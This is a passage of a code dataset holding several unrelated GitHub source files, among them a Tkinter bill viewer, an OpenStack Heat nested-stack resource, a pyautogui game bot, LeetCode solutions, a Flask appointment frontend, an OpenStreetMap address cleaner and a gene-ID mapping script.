income_label.pack(side=\"left\")\n\n transfer_label = tk.Label(month_row, text=str(transfer_count), width=20)\n transfer_label.pack(side=\"left\")\n \n transfer_label = tk.Label(month_row, text=str(all_transfer_count), width=20)\n transfer_label.pack(side=\"left\")\n\n month_button = tk.Button(month_row, text=\"详细\", command=lambda y=year, m=month: create_grandet_bills_window_by_month(y, m), width=10, bg = \"blue\")\n month_button.pack(side=\"right\")\n \n target_transactions = ExtractTransactions.extract_by_year_month(year=year, month=month)\n title = f\"{str(year)}年-{str(month)}月 账单详情\"\n details_button = tk.Button(month_row, text=\"分析\", command=lambda ts=target_transactions, t=title: show_detail_page(ts, t), width=10, bg = \"purple\")\n details_button.pack(side=\"right\")\n\n return yearly_summary\n \n \ndef show_details(root: tk.Tk, year: str):\n \n details_window = tk.Toplevel(root)\n details_window.title(f\"{year} 账单详情\")\n details_label = tk.Label(details_window, text=f\"这里是 {year} 年的账单详情\")\n details_label.pack()\n\n\ndef get_data_by_year(year: int) -> tuple:\n \n files = []\n years = []\n print_log(f\"get {str(year)} year transactions\")\n every_years_transactions = get_value(\"every_years_transactions\")\n if every_years_transactions is None:\n print_log(f\"get every_years_transactions error.\")\n # 账单文件\n files = [\"账单1\", \"账单2\", \"账单3\"]\n years = [(\"1\", 1000, 10, 5, 3, 18),\n (\"2\", 2000, 15, 8, 4, 27),\n (\"3\", 3000, 20, 10, 5, 35)]\n else:\n year_transaction = every_years_transactions.get(str(year))\n \n \n if year_transaction is not None:\n \n print_log(f\"get every_years_transactions success.\")\n all_files = get_value(\"bills_files\")\n files = []\n for item in all_files:\n files.append(os.path.basename(item))\n \n years = []\n month_transactions = []\n if isinstance(year_transaction, YearsTransaction):\n month_transactions = year_transaction.to_MonthsTransaction()\n \n for month_transaction_item in month_transactions.keys(): \n month_transaction = month_transactions.get(month_transaction_item)\n if isinstance(month_transaction, MonthsTransaction):\n month = month_transaction.month\n all_number = TransactionsTools.get_transactions_size(month_transaction)\n summary = round(sum(TransactionsTools.get_amounts(month_transaction)), 3)\n expenditure_count = TransactionsTools.get_summary_count(month_transaction)\n income_count = TransactionsTools.get_income_count(month_transaction)\n transfer_count = TransactionsTools.get_transfer_count(month_transaction)\n \n years.append((month, summary, expenditure_count, income_count, transfer_count, all_number))\n else:\n continue\n else:\n print_log(f\"get every months transactions error.\")\n return (files, years)\n\n\ndef create_grandet_bills_window_by_year(year: int):\n \n # 标题\n title = f\"葛朗台{str(year)}年的账单\"\n # 表头\n head_words = [\"月份\", \"花销总额\", \"支出交易笔数\", \"收入交易笔数\", \"个人转账交易笔数\", \"交易总笔数\", \"分析\", \"详情\"]\n files, months = get_data_by_year(year)\n\n root = tk.Tk()\n root.geometry(\"1600x720\") # 设置窗口大小\n root.title(title)\n bill_frame = tk.Frame(root, width=150) # 设置列表框架宽度为窗口宽度的1/4\n yearly_summary = tk.Frame(root, width=600)\n \n # bill_frame = fill_bill_files(bill_frame=bill_frame, file_names=files)\n \n yearly_summary = fill_bill_information(yearly_summary=yearly_summary,\n root=root,\n head_words=head_words,\n months=months,\n year=year)\n \n\n years_lable = []\n expenditure_counts = []\n income_counts = []\n transfer_counts = []\n all_transfer_counts = []\n \n for month, summary, expenditure_count, income_count, transfer_count, all_transfer_count in months:\n \n years_lable.append(month)\n expenditure_counts.append(expenditure_count)\n income_counts.append(income_count)\n transfer_counts.append(transfer_count)\n all_transfer_counts.append(all_transfer_count)\n \n print(expenditure_counts)\n print(income_counts)\n print(transfer_counts)\n print(all_transfer_counts)\n\n # 创建matplotlib图像并在Tkinter窗口中嵌入它\n fig = Figure(figsize=(5, 4), dpi=100)\n ax = fig.add_subplot(111)\n # 数据\n N = len(years_lable)\n ind = np.arange(N) # x 轴的位置\n width = 0.15 # 柱子的宽度\n rects1 = ax.bar(ind, tuple(expenditure_counts), width, label='expend')\n rects2 = ax.bar(ind + width, tuple(income_counts), width, label='income')\n rects3 = ax.bar(ind + width * 2, tuple(transfer_counts), width, label='self')\n rects3 = ax.bar(ind + width * 3, tuple(all_transfer_counts), width, label='all')\n \n # 添加文本标签和标题\n # ax.set_ylabel('Scores')\n # ax.set_title('Scores by group and gender')\n ax.set_xticks(ind)\n ax.set_xticklabels(tuple(years_lable))\n ax.legend()\n\n canvas = FigureCanvasTkAgg(fig, master=yearly_summary)\n canvas.draw()\n canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n root.mainloop()\n","repo_name":"Light-Blue-Cross/Grandet","sub_path":"src/gui/ui/year_transaction.py","file_name":"year_transaction.py","file_ext":"py","file_size_in_byte":9553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7130066787","text":"# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom requests import exceptions\n\nfrom heat.common import exception\nfrom heat.common import template_format\nfrom heat.common import urlfetch\nfrom heat.engine.properties import Properties\nfrom heat.engine import stack_resource\n\nfrom heat.openstack.common import log as logging\n\nlogger = logging.getLogger(__name__)\n\n\n(PROP_TEMPLATE_URL,\n PROP_TIMEOUT_MINS,\n PROP_PARAMETERS) = ('TemplateURL', 'TimeoutInMinutes', 'Parameters')\n\n\nclass NestedStack(stack_resource.StackResource):\n '''\n A Resource representing a child stack to allow composition of templates.\n '''\n\n properties_schema = {\n PROP_TEMPLATE_URL: {\n 'Type': 'String',\n 'Required': True,\n 'Description': _('The URL of a template that specifies the stack'\n ' to be created as a resource.')},\n PROP_TIMEOUT_MINS: {\n 'Type': 'Number',\n 'Description': _('The length of time, in minutes, to wait for the'\n ' nested stack creation.')},\n PROP_PARAMETERS: {\n 'Type': 'Map',\n 'Description': _('The set of parameters passed to this nested'\n ' stack.')}}\n\n update_allowed_keys = ('Properties',)\n update_allowed_properties = (PROP_TEMPLATE_URL, PROP_TIMEOUT_MINS,\n PROP_PARAMETERS)\n\n def handle_create(self):\n try:\n template_data = urlfetch.get(self.properties[PROP_TEMPLATE_URL])\n except (exceptions.RequestException, IOError) as r_exc:\n raise ValueError(\"Could not fetch remote template '%s': %s\" %\n (self.properties[PROP_TEMPLATE_URL], str(r_exc)))\n\n template = template_format.parse(template_data)\n\n return self.create_with_template(template,\n self.properties[PROP_PARAMETERS],\n self.properties[PROP_TIMEOUT_MINS])\n\n def handle_delete(self):\n return self.delete_nested()\n\n def FnGetAtt(self, key):\n if key and not key.startswith('Outputs.'):\n raise exception.InvalidTemplateAttribute(resource=self.name,\n key=key)\n return self.get_output(key.partition('.')[-1])\n\n def FnGetRefId(self):\n return self.nested().identifier().arn()\n\n def handle_update(self, json_snippet, tmpl_diff, prop_diff):\n # Nested stack template may be changed even if the prop_diff is empty.\n self.properties = Properties(self.properties_schema,\n json_snippet.get('Properties', {}),\n self.stack.resolve_runtime_data,\n self.name)\n\n try:\n template_data = urlfetch.get(self.properties[PROP_TEMPLATE_URL])\n except (exceptions.RequestException, IOError) as r_exc:\n raise ValueError(\"Could not fetch remote template '%s': %s\" %\n (self.properties[PROP_TEMPLATE_URL], str(r_exc)))\n\n template = template_format.parse(template_data)\n\n return self.update_with_template(template,\n self.properties[PROP_PARAMETERS],\n self.properties[PROP_TIMEOUT_MINS])\n\n\ndef resource_mapping():\n return {\n 'AWS::CloudFormation::Stack': NestedStack,\n }\n","repo_name":"rickerc/heat_audit","sub_path":"heat/engine/resources/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70081146712","text":"if pyautogui.pixelMatchesColor(round(1980 * r), round(180 * r), (19, 7, 6), tolerance=2) or pyautogui.pixelMatchesColor(round(1980 * r), round(180 * r), (196, 78, 67), tolerance=50):\n update_status(\"Fighting!\")\n pyautogui.keyDown(\"q\")\n time.sleep(0.1)\n pyautogui.keyUp(\"q\")\n time.sleep(0.1)\n pyautogui.keyDown(\"a\")\n time.sleep(0.02)\n pyautogui.keyUp(\"a\")\n time.sleep(0.1)\n pyautogui.keyDown(\"d\")\n time.sleep(0.02)\n pyautogui.keyUp(\"d\")\n time.sleep(0.1)\n pyautogui.keyDown(\"g\")\n time.sleep(0.1)\n pyautogui.keyUp(\"g\")\n time.sleep(0.3)\n pyautogui.click()\n for _ in range(5):\n pyautogui.keyDown(\"p\")\n time.sleep(0.02)\n pyautogui.keyUp(\"p\")\n time.sleep(0.5)\n\n# elif pyautogui.pixelMatchesColor(round(3250*r), round(200*r), (169, 6, 17), tolerance=20):\nelse:\n update_status(\"Matching!\")\n time.sleep(0.5)\n pyautogui.click(x=round(2371 * r), y=round(1648 * r))\n time.sleep(2)\n pyautogui.click(x=round(2080 * r), y=round(300 * r))\n time.sleep(2)\n pyautogui.click(x=round(1920 * r), y=round(1620 * r))\n time.sleep(2)\n pyautogui.click(x=round(3600 * r), y=round(1800 * r))\n time.sleep(2)\n","repo_name":"zhlzhl123/auto","sub_path":"destiny/hunzhan.py","file_name":"hunzhan.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6070120613","text":"class HitCounter:\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self._timeline = []\n\n def hit(self, timestamp: int) -> None:\n \"\"\"\n Record a hit.\n @param timestamp - The current timestamp (in seconds granularity).\n \"\"\"\n self._timeline.append(timestamp)\n\n def getHits(self, timestamp: int) -> int:\n \"\"\"\n Return the number of hits in the past 5 minutes.\n @param timestamp - The current timestamp (in seconds granularity).\n \"\"\"\n bound = timestamp - 300\n lo, hi = 0, len(self._timeline)\n while lo < hi:\n mid = lo + (hi - lo) // 2\n if self._timeline[mid] <= bound:\n lo = mid + 1\n else:\n hi = mid\n\n return len(self._timeline) - lo\n\n\n# Your HitCounter object will be instantiated and called as such:\n# obj = HitCounter()\n# obj.hit(timestamp)\n# param_2 = obj.getHits(timestamp)","repo_name":"mingaki/leetcode","sub_path":"362.design-hit-counter.py","file_name":"362.design-hit-counter.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36252897082","text":"class Solution:\n def isPalindrome(self, A: str) -> bool:\n A = A.lower()\n LL = []\n for i in A:\n if i.isalnum():\n LL.append(i)\n LLR = list(reversed(LL))\n if LL != LLR:\n return False\n return True\n","repo_name":"impiyush83/code","sub_path":"leetcode/125-valid-palindrome.py","file_name":"125-valid-palindrome.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"36015254508","text":"from datetime import date\n\nimport jsonrpclib\nfrom flask import Flask, redirect, render_template, request, session, url_for\nfrom markupsafe import escape\n\napp = Flask(__name__)\n\nclient = jsonrpclib.ServerProxy('http://0.0.0.0:8000/api')\n\n\n@app.template_filter('date_to_string')\ndef timestamp_to_datetime(datestring):\n return date.fromisoformat(datestring).strftime('%a, %B %-d, %Y')\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef login():\n if request.method == \"GET\":\n return render_template(\"index.html\")\n params = dict(request.form)\n action = params.pop('action', None)\n owner = params.pop('owner', '')\n notes = params.pop('notes', None)\n admin = bool(params.pop('admin', False))\n appointments = []\n error = None\n\n try:\n if action == 'create-appointment':\n client.appointments.register(\n datestring=params['date'], owner=owner, notes=notes)\n except jsonrpclib.AppError as e:\n error = e.args[0][1]\n\n try:\n appointments = client.appointments.list()\n if not admin:\n appointments = [\n appointment for appointment in appointments if appointment['owner'] == owner]\n\n if action == 'cancel-appointments':\n remove = []\n for i, appointment in enumerate(appointments):\n if params.get(str(appointment['date'])) == 'on':\n if admin or appointment['owner'] == owner:\n client.appointments.cancel(appointment['date'])\n remove.append(i)\n for i in reversed(remove):\n appointments.pop(i)\n except jsonrpclib.AppError as e:\n error = e.args[0][1]\n\n return render_template(\n \"index.html\",\n appointments=appointments,\n admin=admin,\n owner=owner,\n error=error)\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", debug=True, port=5000)\n","repo_name":"Fireflyhealth-Recruiting/dev-ops-take-home","sub_path":"webserver/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71094849752","text":"import re\n\n\n# full replacements for keys\nKEY_MAP = {\n 'Street': 'addr:street',\n 'Telefon': 'phone',\n 'hrsz': 'addr:hrsz',\n 'postal_code': 'addr:postcode',\n 'hrsz': 'addr:hrsz',\n 'acess': 'access',\n 'architectq': 'architect',\n 'disusedhighway': 'disused:highway'\n}\n\n\n# full replacements for postcodes\nPOSTCODE_MAP = {\n '1130': '1131',\n '1231': '1213',\n '2128': '2821',\n '1519': '1111'\n}\n\n\n# full replacements for city names\nCITY_MAP = {\n u'Alcsutdoboz': u'Alcs\\xfatdoboz',\n u'1085': u'Budapest',\n u'budapest': u'Budapest',\n u'Budapest V': u'Budapest',\n u'Budapest,': u'Budapest',\n u'Budapeste': u'Budapest',\n u'hatvan': u'Hatvan',\n u'kisoroszi': u'Kisoroszi',\n u'nagyk\\xe1ta': u'Nagyk\\xe1ta',\n u'Pom\\ufffdz': u'Pom\\xe1z',\n u'\\xe9rd': u'\\xc9rd',\n u'\\u0150\\xe9cel': u'P\\xe9cel',\n u'v\\xe1c': u'V\\xe1c',\n u'S\\u0171lys\\xe1p': u'S\\xfclys\\xe1p',\n u'Ag\\xe1ed': u'G\\xe1rdony-Ag\\xe1rd',\n u'Ag\\xe1rd': u'G\\xe1rdony-Ag\\xe1rd',\n u'Agosty\\xe1n': u'Tata-Agosty\\xe1n',\n u'Torny\\xf3puszta': u'Tarj\\xe1n-Torny\\xf3puszta',\n u'Bikolpuszta': u'S\\xfctt\\u0151-Bikolpuszta',\n u'Dinny\\xe9s': u'G\\xe1rdony-Dinny\\xe9s',\n u'B\\xf6rzs\\xf6nyliget': u'Kismaros-B\\xf6rzs\\xf6nyliget',\n u'Domonyv\\xf6lgy': u'Domony-Domonyv\\xf6lgy',\n u'undefined': None\n}\n\n# partial replacements for street names\nSTREET_REPLACE_MAP = {\n u'krt.': u'k\\u00F6r\\u00FAt',\n u'Tere': u'tere',\n u'Park': u'park',\n u'\\u0171t': u'\\u00FAt',\n u'\\u00E9pcs\\u00F6': u'\\u00E9pcs\\u0151',\n u'uca': u'utca',\n u'u.': u'utca',\n u' u ': u'utca',\n u'Szz\\u00E1ll\\u00E1s': u'Sz\\u00E1ll\\u00E1s',\n u'p\\xe1lyaudvar': u'P\\xe1lyaudvar',\n u'Kereng\\u0151': u'kereng\\u0151',\n u'\\u00FAtca': u'utca'\n}\n\n\n# full replacements for street names\nSTREET_MAP = {\n u'Gy\\u00F6rgyutca': u'Gy\\u00F6rgy utca',\n u'Palota-kert': u'Palotakert',\n u'Mariav\\u00F6lgy': u'M\\u00E1riav\\u00F6lgy',\n u'\\xdajbuda K\\xf6zpont': u'\\xdajbuda-k\\xf6zpont',\n u'Vaci ut': u'V\\xe1ci \\xfat',\n u'M\\xe1ramaros ut': u'M\\xe1ramaros \\xfat',\n u'D\\xf3zsa Gy\\xf6rgyutca': u'D\\xf3zsa Gy\\xf6rgy utca',\n u'Bev\\xe1s\\xe1rl\\xf3utca2': u'Bev\\xe1s\\xe1rl\\xf3 utca 2',\n u'Stef\\xe1nia ut': u'Stef\\xe1nia \\xfat',\n u'Z\\xf6ldfa utca (XXII ker\\xfclet)': u'Z\\xf6ldfa utca (XXII. ker\\xfclet)'\n}\n\n\n# identify Slovakian postcodes\nre_postcode_slovakian = re.compile(r'^\\d{3}\\s\\d{2}$')\nre_postcode_slovakian_invalid = re.compile(r'^\\d{5}$')\n\n\n# use to identify typographical number values\nre_hrsz = re.compile(r'hrsz', re.I)\n\n\n# use to clean house number values\nre_housenumber = [\n\n # '12/A fsz.' -> '12/A/1' (fsz. = ground floor)\n (re.compile(r'\\s+FSZ\\.'), '/1/'),\n\n # '123.' -> '123'\n (re.compile(r'\\.'), ''),\n\n # '12/B ??' -> '12/B',\n (re.compile(r'\\?'), ''),\n\n # '26;33' -> '26,33'\n (re.compile(r'\\;'), ','),\n\n # '10, 12, 14' -> '10,12,14'\n (re.compile(r',\\s+'), ','),\n\n # '1 / A - 3 / C' -> '1/A-3/C'\n (re.compile(r'\\s+([\\/\\-])\\s+'), r'\\1'),\n\n # '4/' -> '4'\n # '13-' -> '13'\n (re.compile(r'[\\/\\-]$'), ''),\n\n # '16 A' -> '16/A'\n (re.compile(r'(\\d)\\s+([A-Z]{1})'), r'\\1/\\2'),\n\n # '100A-100B' -> '100/A-100/B'\n (re.compile(r'(\\d)([A-Z])'), r'\\1/\\2')\n]\n\n\n# full replacements for house numbers\nHOUSENUMBER_MAP = {\n # fix issue caused by str.upper\n u'19/KM PIHEN\\u0150': u'19/km pihen\\u0151'\n}\n\n\n# understand as: COLUMN_SHIFT_MAP[key_from][value_from][key_to] = value_to\nCOLUMN_SHIFT_MAP = {\n\n # cloumn shift issues in house numbers\n 'housenumber': {\n '0135/36': {\n 'hrsz': '0135/36'\n },\n '0152': {\n 'hrsz': '0152'\n },\n '019/8 hrsz': {\n 'hrsz': '019/8'\n },\n '0192/34': {\n 'hrsz': '0192/34'\n },\n '06/79': {\n 'hrsz': '06/79'\n },\n '081/15 hrsz': {\n 'hrsz': '081/15'\n },\n '15/7 hrsz': {\n 'hrsz': '15/7'\n }\n },\n\n # column shift issues in streets\n 'street': {\n\n u'Szent Istv\\xe1n k\\xf6r\\xfat 13': {\n 'street': u'Szent Istv\\xe1n k\\xf6r\\xfat',\n 'housenumber': '13'\n },\n\n u'V\\xe1ci \\xfat 46/B': {\n 'street': u'V\\xe1ci \\xfat ',\n 'housenumber': '46/B'\n },\n\n u'V\\xe1ci \\xfat 46/B.': {\n 'street': u'V\\xe1ci \\xfat',\n 'housenumber': '46/B'\n },\n\n u'Gy\\xf6ngyvir\\xe1g utca (L\\xf3nyaytelep) 8': {\n 'street': u'Gy\\xf6ngyvir\\xe1g utca',\n 'housenumber': '8'\n },\n\n u'Vak Botty\\xe1n utca 75/a': {\n 'street': u'Vak Botty\\xe1n utca',\n 'housenumber': '75/a'\n },\n\n u'Dob utca 55': {\n 'street': u'Dob utca',\n 'housenumber': '55'\n },\n\n u'Bev\\xe1s\\xe1rl\\xf3 utca 2': {\n 'street': u'Bev\\xe1s\\xe1rl\\xf3 utca',\n 'housenumber': '2'\n },\n\n u'Liszenk\\xf3 telep 0318 hrsz.': {\n 'street': u'Liszenk\\xf3 telep',\n 'hrsz': '0318'\n },\n\n u'K\\xfclter\\xfclet 0195/18 hrsz': {\n 'street': u'K\\xfclter\\xfclet',\n 'hrsz': '0195/18'\n }\n }\n}\n\n\ndef clean_key(key, key_map=KEY_MAP):\n \"\"\" Clean a key. \"\"\"\n key = key.replace('.', ':')\n if key in key_map:\n return key_map[key]\n return key\n\n\ndef clean_postcode(postcode, postcode_map=POSTCODE_MAP):\n \"\"\" Clean a postcode. \"\"\"\n if re_postcode_slovakian.search(postcode) is not None:\n return postcode\n if re_postcode_slovakian_invalid.search(postcode) is not None:\n return '{0} {1}'.format(postcode[:3], postcode[3:])\n if postcode in postcode_map:\n return postcode_map[postcode]\n return postcode\n\n\ndef clean_city(city, city_map=CITY_MAP):\n \"\"\" Clean a city name. \"\"\"\n city = city.replace(' - ', '-')\n if city in city_map:\n return city_map[city]\n return city\n\n\ndef clean_street(street,\n street_replace_map=STREET_REPLACE_MAP,\n street_map=STREET_MAP):\n \"\"\" Clean a street name. \"\"\"\n for key in street_replace_map.keys():\n if key in street:\n street = street.replace(key, street_replace_map[key])\n if street in street_map:\n street = street_map[street]\n return street[0].capitalize() + street[1:]\n\n\ndef clean_state(state):\n \"\"\" Clean a state name. \"\"\"\n return state.title()\n\n\ndef clean_housenumber(housenumber, housenumber_map=HOUSENUMBER_MAP):\n \"\"\" Clean a house number. \"\"\"\n # do not clean typographical numbers\n if re_hrsz.search(housenumber) is not None:\n return housenumber\n # standardize characters to uppercase\n housenumber = housenumber.upper()\n # replace UNICODE minus sign with dash symbol\n housenumber = housenumber.replace(u'\\u2013', '-')\n # standardize format\n for pattern, replacement in re_housenumber:\n if pattern.search(housenumber) is not None:\n housenumber = pattern.sub(replacement, housenumber)\n housenumber = housenumber.strip()\n if housenumber in housenumber_map:\n return housenumber_map[housenumber]\n return housenumber\n\n\ndef clean_value(key, value):\n \"\"\" Clean a key and a value. \"\"\"\n key = clean_key(key)\n if key == 'addr:postcode':\n value = clean_postcode(value)\n if key == 'addr:city':\n value = clean_city(value)\n if key == 'addr:street':\n value = clean_street(value)\n if key == 'addr:state':\n value = clean_state(value)\n if key == 'addr:housenumber':\n value = clean_housenumber(value)\n return key, value\n\n\ndef clean_address(address):\n \"\"\" Clean an address, fix column shift errors. \"\"\"\n for key_from in COLUMN_SHIFT_MAP.keys():\n if key_from in address:\n value_from = address[key_from]\n if value_from in COLUMN_SHIFT_MAP[key_from]:\n values_to = COLUMN_SHIFT_MAP[key_from][value_from]\n keys_to = values_to.keys()\n # update keys\n for key_to in keys_to:\n address[key_to] = values_to[key_to]\n # delete the original key if it has not been updated\n if key_from not in keys_to:\n del address[key_from]\n return address\n","repo_name":"gaborsar/udacity-data-analyst-nanodegree-p3","sub_path":"clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":8262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2099188442","text":"import os\nimport time\n\nfrom gym_scalable.envs.grid.maps import map_loader\nfrom gym_scalable.envs.grid.multi_chaser_evader_env import GridChaserVsEvaderEnv\n\nprint(os.getcwd())\nenv = GridChaserVsEvaderEnv(\n config={\"mapfile\": map_loader.get_8x8_map(), \"RL_evader\": False, \"full_state\": False, \"normalize_state\": True})\n\nstate = env.reset()\ni = 0\ngoal = env.grid.goal\n\nwhile True:\n i += 1\n env.render()\n\n action1 = env.action_space.sample()\n action2 = env.action_space.sample()\n\n state, reward, done, _ = env.step(actions={\"evader\": action1, \"chaser\": action2})\n\n print(f\"state : {state}\")\n print(f\"reward : {reward}\")\n print(f\"done : {done}\")\n\n # print(env.normalize_state)\n if (done[\"__all__\"]):\n env.reset()\n\n # input()\n time.sleep(0.1)\n","repo_name":"kinseyreeves/Deep-RL-Baselines","sub_path":"Testing/env_testers/test_multi_chaser_vs_evader.py","file_name":"test_multi_chaser_vs_evader.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"10943287050","text":"#Get mgi ids of genes from MGI, Ensemble and Uniprot databases as these databases may contain MGI ids of different gene names.\n#input: \n#\tmerged_gene_protein_features_with_ids_missing_vals.csv (contain gene names of the genes)\n#\tgenenames_mgiids_from_mgi.txt (downloaded from MGI)\n#\tgenenames_mgiids_from_ensemble.txt (downloaded from Ensemble)\n#\tgenenames_mgiids_from_uniprot.txt (downloaded from Uniprot)\n#output: a csv file containing gene names and their MGI ids\n#\n#format of genenames_mgiids_from_mgi.txt\n#\n#Input\tInput Type\tMGI Gene/Marker ID\tSymbol\tName\tFeature Type\n#Plekhg2\tcurrent symbol\tMGI:2141874\tPlekhg2\tpleckstrin homology domain containing, family G (with RhoGef domain) member 2\tprotein coding gene\n#1700006E09Rik\tcurrent symbol\tMGI:1922687\t1700006E09Rik\tRIKEN cDNA 1700006E09 gene\tprotein coding gene\n#Cers4\tcurrent symbol\tMGI:1914510\tCers4\tceramide synthase 4\tprotein coding gene\n#Cers5\tcurrent symbol\tMGI:1919199\tCers5\tceramide synthase 5\tprotein coding gene\n#Cers5\thuman synonym\tMGI:2442564\tCers6\tceramide synthase 6\tprotein coding gene\n#\n#format of genenames_mgiids_from_ensemble.txt\n#\n#MGI symbol,MGI ID\n#mt-Nd1,MGI:101787\n#mt-Nd2,MGI:102500\n#mt-Co1,MGI:102504\n#mt-Co2,MGI:102503\n#mt-Atp8,MGI:99926\n#\n#format of genenames_mgiids_from_uniprot.txt\n#\n#ID D3YY99_MOUSE Unreviewed; 205 AA.\n#AC D3YY99;\n#DT 20-APR-2010, integrated into UniProtKB/TrEMBL.\n#DT 20-APR-2010, sequence version 1.\n#DT 24-JUN-2015, entry version 35.\n#DE SubName: Full=Pleckstrin homology domain-containing family G member 2 {ECO:0000313|Ensembl:ENSMUSP00000118217};\n#DE Flags: Fragment;\n#...\n#DR MGI; MGI:2141874; Plekhg2.\n#\n#note: if a gene name has no MGI id in MGI, Ensemble and Uniprot, its MGI id is 'none' for the MGI_ID feature.\n\nimport sys\nimport re\n\ndef main():\n\tinfile ='/home/david/Dropbox/datasets/essential genes prediction/unknown essentiality genes/103 features data/merged_gene_protein_features_with_ids_missing_vals_non-mouse_genes_removed_and_duplicates_removed.csv'\n\tinfile2='/home/david/Dropbox/datasets/essential genes prediction/unknown essentiality genes/genenames_mgiids_from_mgi.txt'\n\tinfile3='/home/david/Dropbox/datasets/essential genes prediction/unknown essentiality genes/genenames_mgiids_from_ensemble.txt'\n\tinfile4 = '/home/david/Dropbox/datasets/essential genes prediction/unknown essentiality genes/genenames_mgiids_from_uniprot.txt'\n\toutfile = '/home/david/Dropbox/datasets/essential genes prediction/unknown essentiality genes/genenames_mgiids.csv'\n\n\tinfileL = [line.strip() for line in open(infile)]\n\n\tif len(infileL)==0:\n\t\tprint(infile+\" is empty.\")\n\t\tsys.exit(-1)\n\n\tinfile2L = [line.strip() for line in open(infile2)]\n\n\tif len(infile2L)==0:\n\t\tprint(infile2+\" is empty.\")\n\t\tsys.exit(-1)\n\t\n\tinfile3L = [line.strip() for line in open(infile3)]\n\n\tif len(infile3L)==0:\n\t\tprint(infile3+\" is empty.\")\n\t\tsys.exit(-1)\n\n\tinfile4L = [line.strip() for line in open(infile4)]\n\n\tif len(infile4L)==0:\n\t\tprint(infile4+\" is empty.\")\n\t\tsys.exit(-1)\n\n\thash_mgiids_infile = {}\n\thash_mgiids_infile2 = {}\n\thash_mgiids_infile3 = {}\n\thash_mgiids_infile4 = {}\n\tfor line in infile2L[1:len(infile2L)]:\n\t\tvals = line.split('\\t')\n\t\tgenename = vals[0]\n\t\tgenename = genename.lower()\n\t\tinput_type = vals[1]\n\t\tif input_type == 'current symbol' or input_type == 'old symbol' or input_type == 'synonym' or input_type == 'related synonym':\n\t\t\tmgiid = vals[2]\n\t\t\tif hash_mgiids_infile.get(genename) == None:\n\t\t\t\tif mgiid != '':\n\t\t\t\t\thash_mgiids_infile[genename] = mgiid\n\t\t#\telse:\n\t\t#\t\tprint(genename+' in '+infile2+' has more than one MGI id. '+hash_mgiids_infile2[genename]+' is chosen.')\n\t\t\tif hash_mgiids_infile2.get(genename) == None:\n\t\t\t\tif mgiid != '':\n\t\t\t\t\thash_mgiids_infile2[genename] = mgiid\n\n\tfor line in infile3L[1:len(infile3L)]:\n\t\tvals = line.split(',')\n\t\tgenename = vals[0]\n\t\tgenename = genename.lower()\n\t\tmgiid = vals[1]\n\t\tif hash_mgiids_infile.get(genename) == None:\n\t\t\tif mgiid != '':\n\t\t\t\thash_mgiids_infile[genename] = mgiid\n\t\t#else:\n\t\t#\tprint(genename+' in '+infile3+' has more than one MGI id. '+hash_mgiids_infile3[genename]+' is chosen.')\n\t\tif hash_mgiids_infile3.get(genename) == None:\n\t\t\tif mgiid != '':\n\t\t\t\thash_mgiids_infile3[genename] = mgiid\n\n\tfor line in infile4L:\n\t\tm = re.match('^DR\\s+MGI;\\s+(MGI:\\d+);\\s+(.+)$',line)#DR MGI; MGI:103007; Epb4.1l4a.\n\t\tif m:\n\t\t\tgenename = m.group(2)\n\t\t\tgenename = genename.strip('.')\n\t\t\tgenename = genename.lower()\n\t\t\tmgiid = m.group(1)\n\t\t\tif hash_mgiids_infile.get(genename) == None:\n\t\t\t\thash_mgiids_infile[genename] = mgiid\n\t\t#\telse:\n\t\t#\t\tprint(genename+' in '+infile4+' has more than one MGI id. '+hash_mgiids_infile4[genename]+' is chosen.')\n\t\t\tif hash_mgiids_infile4.get(genename) == None:\n\t\t\t\tif mgiid != '':\n\t\t\t\t\thash_mgiids_infile4[genename] = mgiid\n\n\t#write MGI ids to file\n\tt = len(infileL)-1 #total no. of gene names\n\tj = 0 #no. of gene names with MGI ids\n\tk = 0 #no. of gene names with no MGI ids in MGI, Ensemble and Uniprot\n\tfw = open(outfile,'w')\n\tfw.write('GeneName,MGI_ID\\n')\n\tfor line in infileL[1:len(infileL)]:\n\t\tvals = line.split(',')\n\t\tgenename = vals[0]\n\t\tgenename2 = genename.lower()\t\t\n\t\tif hash_mgiids_infile.get(genename2)!= None:\n\t\t\tj += 1\n\t\t\tfw.write(genename+','+hash_mgiids_infile.get(genename2)+'\\n')\n\t\telse:\n\t\t\tfw.write(genename+',none\\n')\n\t\t\tk += 1\n\tfw.close()\n\tprint('total no. of gene names in infile: '+str(t))\n\tprint(str(j)+' gene names have MGI ids.')\n\tprint(str(k)+' gene names do not have MGI ids in MGI, Ensemble and Uniprot.')\n\tprint('MGI has '+str(len(hash_mgiids_infile2))+' MGI ids.')\n\tprint('Ensemble has '+str(len(hash_mgiids_infile3))+' MGI 